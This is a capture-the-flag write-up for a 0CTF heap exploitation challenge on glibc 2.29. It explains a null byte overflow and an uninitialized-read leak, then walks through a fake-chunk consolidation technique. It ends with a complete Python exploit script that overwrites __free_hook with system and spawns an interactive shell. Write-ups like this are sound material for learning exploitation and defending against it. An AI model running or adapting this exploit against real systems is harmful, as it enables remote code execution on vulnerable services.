This is one more challenge from the “heap exploitation puzzle franchise”. Like many times before you can almost directly interact with the heap. Typical for 0CTF, allocations were tracked on a mmapped page at an entirely random address. Together with the address, the size of the allocation is stored as well. There can be at most 16 allocations at a time. You can update, view and delete these allocations, and as long as you are within the 16-allocation limit, you can also create new allocations.
In this challenge there are two vulnerabilities. First, allocations are created with malloc and not immediately initialized, so that when viewed directly after allocation, you recieve the old content. Second, when updating you can only provide bytes up to the size you specified when allocating the chunk, but a null byte is always added. This results in the infamous null byte overflow.
In the libc version (2.29) used in this task, a consistency check was added. It makes sure that when a chunk is consolidated backwards, the size
of the previous chunk matches the value of prev_size
. With this check, the usual “forgotten chunk” technique cannot be used directly. As a recap, you would create a situation where you would have a free chunk, followed by two used ones. Then you would overflow from the second into the third chunk, clear the prev_in_use
bit and set the prev_size
to the size of the first two chunks combined. When the third chunk is subsequently freed, it will consolidate backwards and swallow the chunk in the middle. The problem here is that, without modifying the header of the first chunk, the size == prev_size
check added in this libc version would fail. To circumvent it, we have to create a fake chunk header, but that adds the complexity of faking a doubly-linked list structure. The simplest doubly-linked list we can create has the forward and backwards pointer of the chunk point to itself. For this we have to know the address of the heap. We utilize the first vulnerability and the linked list of tcaches
to achieve this. Chunks are only consolidated backwards when they are regularly freed, but libc 2.29 uses tcaches
which form a cache of seven entries per size which are held back from the backend allocator. These seven chunks are stored in a singly-linked list with the pointer being stored inline. As we have to saturate this list in order to get chunks actually freed, we can allocate one chunk, get a cached one, and because of vulnerability one, we can leak the heap address from that. Now we can finally build our fake chunk, and use it in place of the first chunk from the “forgotten chunk” technique. Now two allocations overlap and we are granted full access over the heap management structures stored inline. We abuse the tcache
free list to allocate a chunk within the libc and overwrite the __free_hook
.
#!/usr/bin/env python3
import re
import socket
import struct
import sys
import telnetlib
libc_free_hook = 0x1e75a8
libc_arena = 0x1e4f90
libc_system = 0x52fd0
def recv_until(sock, delim):
tmp = b''
while delim not in tmp:
try:
r = sock.recv(1)
if not r:
return tmp
tmp += r
except InterruptedError:
pass
return tmp
def add(s, l):
s.send("1\n{:d}\n".format(l).encode())
recv_until(s, b"Size: ")
line = recv_until(s, b"\n").decode()
m = re.match("Chunk ([0-9]+) Allocated", line)
return int(m.groups(1)[0])
def update(s, i, d):
s.send("2\n{:d}\n{:d}\n".format(i, len(d)).encode())
recv_until(s, b"Content: ")
s.send(d)
def delete(s, i):
s.send("3\n{:d}\n".format(i).encode())
recv_until(s, b"Index")
def view(s, i):
s.send("4\n{:d}\n".format(i).encode())
recv_until(s, b"Index: ")
st = b"1. Allocate"
recv_until(s, "Chunk[{:d}]: ".format(i).encode())
return recv_until(s, st)[:-len(st)-1]
tar = ("localhost", 1337)
if len(sys.argv) == 3:
tar = (sys.argv[1], int(sys.argv[2]))
with socket.socket() as s:
s.connect(tar)
add(s, 0xf8) # 0
add(s, 0xf8) # 1
add(s, 0xf8) # 2
delete(s, 1)
delete(s, 0)
add(s, 0xf8) # 0
heap = int.from_bytes(view(s, 0), "little") - 0x260 - 0x100
print("[+] heap @ {:#x}".format(heap))
add(s, 0xf8) # 1
for i in range(10): # 3 - 13
add(s, 0xf8)
# fill tchache free list
for i in range(7): # 5 - 11
delete(s, 5 + i)
# combine chunks 0, 1
delete(s, 1)
delete(s, 0)
# allocate it
add(s, 0x1f8) # 0
# write fake chunk
update(s, 0, b"SPARTA".ljust(0xf8, b"A") + struct.pack("<QQQ", 0x201, heap + 0x350, heap + 0x350))
# clear prev_in_use and set prev_size
update(s, 2, b"sparta".ljust(0xf0, b"a") + struct.pack("<Q", 0x200))
# forgotten chunk
delete(s, 3)
# drain tcaches
tmp = [add(s, 0xf8) for i in range(7)]
# alloc forgotten chunk (the upper chunk of the combined ones is in its place -> libc leak)
low = add(s, 0xf8)
libc = int.from_bytes(view(s, low), "little") - libc_arena
print("[+] libc @ {:#x}".format(libc))
# generic tcache __free_hook pwn
dbl = add(s, 0xf8)
delete(s, low)
delete(s, dbl)
update(s, 2, struct.pack("<Q", libc + libc_free_hook)[:-1])
tmp = add(s, 0xf8)
hook = add(s, 0xf8)
update(s, hook, struct.pack("<Q", libc + libc_system))
update(s, tmp, b"/bin/sh")
delete(s, tmp)
print("$ ")
t = telnetlib.Telnet()
t.sock = s
t.interact()